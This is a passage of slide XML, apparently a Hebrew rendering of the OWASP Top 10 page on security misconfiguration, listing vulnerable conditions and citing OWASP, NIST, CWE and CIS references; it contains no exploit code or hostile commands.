              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>היישום עשוי להיות פגיע במידה:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קיים מחסור בהקשחת רכיבי המערכת או הרשאות לא נכונות בשירותי הענן</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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יכולות בלתי נדרשות מופעלות או מותקנות (דוגמת פורטים בלתי נדרשים, שירותים, עמודים, חשבונות או הרשאות).</a:t>
            </a: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חשבונות ברירת מחדל והסיסמאות שלהם מאופשרים או שלא השתנו.</a:t>
            </a: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בקרת שגיאות חושפת למשתמשים עקבות או מידע אחר דוגמת הודעות שגיאה.</a:t>
            </a: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עבור מערכות שעברו שדרוג, יכולות אבטחה עדכניות מבוטלות או אינן מוגדרות בצורה מאובטחת.</a:t>
            </a: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הגדרות האבטחה בשרתי האפליקציה, מסגרות העבודה של היישום (דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ASP.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ועוד), ספריות, בסיסי נתונים ועוד, אינם מוגדרים עם ערכים מאובטחים.</a:t>
            </a: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השרת אינו שולח </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>security headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או הנחיות או שאינם מוגדרים עם ערכים מאובטחים.</a:t>
            </a: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היישום אינו עדכני או פגיע (ראה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>שימוש ברכיבים עם פגיעויות ידועות - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ללא תיאום תהליך הגדרות מאובטח ומחזורי, מערכות נמצאות בסיכון גבוה.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="6372200"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>לדרישות נוספות בתחום, ראה מסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Application Security Verification Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>V19 Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Guide to General Server Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE-16: Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE-388: Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Amazon S3 Bucket Discovery and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תהליך התקנה מאובטח צריך להיות מיושם, לרבות:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
